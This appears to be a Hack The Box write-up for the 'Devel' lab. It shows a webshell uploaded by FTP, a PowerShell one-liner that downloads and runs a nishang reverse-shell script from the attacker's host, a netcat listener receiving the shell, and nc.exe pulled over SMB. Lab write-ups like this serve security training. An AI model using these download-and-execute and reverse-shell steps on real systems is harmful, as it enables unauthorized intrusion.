File Upload
┌──(kali㉿kali)-[~/archive/htb/labs/devel]
└─$ tree /usr/share/webshells/asp*
/usr/share/webshells/asp
├── cmd-asp-5.1.asp
└── cmdasp.asp
/usr/share/webshells/aspx
└── cmdasp.aspx
0 directories, 1 fileA total of 3 .NET based webshell locally available
I will go with cmdasp.aspx as the web framework is done in ASP.NET
┌──(kali㉿kali)-[~/archive/htb/labs/devel]
└─$ cp /usr/share/webshells/aspx/cmdasp.aspx . ; mv cmdasp.aspx webshell.aspxI copied the file to the current working directory and changed its name to webshell.aspx
ftp> put webshell.aspx
local: webshell.aspx remote: webshell.aspx
229 Entering Extended Passive Mode (|||49173|)
125 Data connection already open; Transfer starting.
100% |**********************************************************************************| 1442 23.70 mib/s --:-- ETA
226 Transfer complete.
1442 bytes sent in 00:00 (45.41 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49174|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
10-13-22 07:16PM 1442 webshell.aspx
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.I uploaded the webshell.aspx file to the FTP server that is serving the web server
Upload successful.
webshell.aspx is present on the web root as expected.
But I don’t want this half ass shell. A stable shell has to be established
┌──(kali㉿kali)-[~/archive/htb/labs/devel]
└─$ cp /home/kali/Tools/nishang/Shells/Invoke-PowerShellTcp.ps1 .
┌──(kali㉿kali)-[~/archive/htb/labs/devel]
└─$ echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 9999" >> Invoke-PowerShellTcp.ps1nishang’s Invoke-PowerShellTcp.ps1 script would be a good choice
I will start a web server on Kali to host this script for the target system to fetch
I also appended the command itself to the bottom of the script so that it will be executed upon fetch
┌──(kali㉿kali)-[~/archive/htb/labs/devel]
└─$ simplehttp .
serving http on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...Starting a web server on Kali port 8000, hosting the Invoke-PowerShellTcp.ps1 script
powershell -ep bypass iex (new-object net.webclient).downloadstring('http://10.10.14.6:8000/Invoke-PowerShellTcp.ps1')
the command above sends a get request to http://10.10.14.6:8000/Invoke-PowerShellTcp.ps1
The PowerShell script has been fetched by the target machine
┌──(kali㉿kali)-[~/archive/htb/labs/devel]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.5] 49166
Windows PowerShell running as user DEVEL$ on DEVEL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
ps c:\windows\system32\inetsrv>
ps c:\windows\system32\inetsrv> whoami
iis apppool\web
ps c:\windows\system32\inetsrv> hostname
devel
ps c:\windows\system32\inetsrv> ipconfig
Windows IP Configuration
ethernet adapter local area connection 3:
connection-specific dns suffix . :
ipv6 address. . . . . . . . . . . : dead:beef::58c0:f1cf:abc6:bb9e
temporary ipv6 address. . . . . . : dead:beef::1431:9150:87cb:761b
link-local ipv6 address . . . . . : fe80::58c0:f1cf:abc6:bb9e%15
ipv4 address. . . . . . . . . . . : 10.10.10.5
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%15
10.10.10.2
tunnel adapter isatap.{c57f02f8-df4f-40ee-bc21-a206b3f501e4}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . :
tunnel adapter local area connection* 9:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . : Netcat listener received the shell and a connection was established as the web process executed the script
Initial Foothold as iis apppool\web via file upload
NC64.exe
PS C:\> mkdir tmp ; cd tmp
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 13/1/2023 9:51 ?? tmp
PS C:\tmp> copy \\10.10.14.6\smb\nc.exe nc.exeMaking a directory at the system root; C:\tmp
The directory will be served as a storage for this operation
I also transferred Netcat to the target system over SMB